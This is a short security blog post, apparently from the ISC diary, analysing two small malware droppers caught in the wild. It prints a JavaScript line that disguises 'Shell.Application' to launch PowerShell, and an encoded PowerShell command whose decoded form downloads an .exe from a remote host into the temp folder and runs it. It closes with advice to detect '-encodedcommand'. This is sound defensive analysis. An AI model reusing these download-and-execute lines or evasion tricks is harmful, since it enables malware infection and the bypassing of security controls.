Diverting built-in features for the bad
Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code:
var d=new ActiveXObject(‘Shell.NormandApplication’.replace(‘Normand’, ‘’)); d.ShellExecute(“PowerShell”,”((New-Object System.Net.WebClient).DownloadFile(‘http://[redacted].exe', ‘xwing.pif’);Start-Process ‘xwing.pif’”,””,””,0);
There is no real obfuscation here, just a trick to avoid the detection of the string ‘Shell.Application’ which often searched by automated tools…
Sometimes, there is no need to implement complex code to bypass detection. A good example comes with PowerShell which has the following cool feature: EncodedCommand[1].
Accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces.
Here is a sample that I also detected yesterday (the lines have been truncated for the readability):
poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \ IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\ kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\ AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\ BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\ dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\ 0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g
The decoded Base64 string is:
(nEw-objecT SySTem.Net.WEbCliENt).DowNLoaDFIlE( https://[redacted]/images/Scan_2.exe , $env:TEmP\output.exe ) ; inVokE-ExPResSIoN $ENv:tEMP\output.exe
Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the "-encodedcommand" string (and ignore the case).
Note that the PE file is downloaded via HTTPS!
[1] https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Comments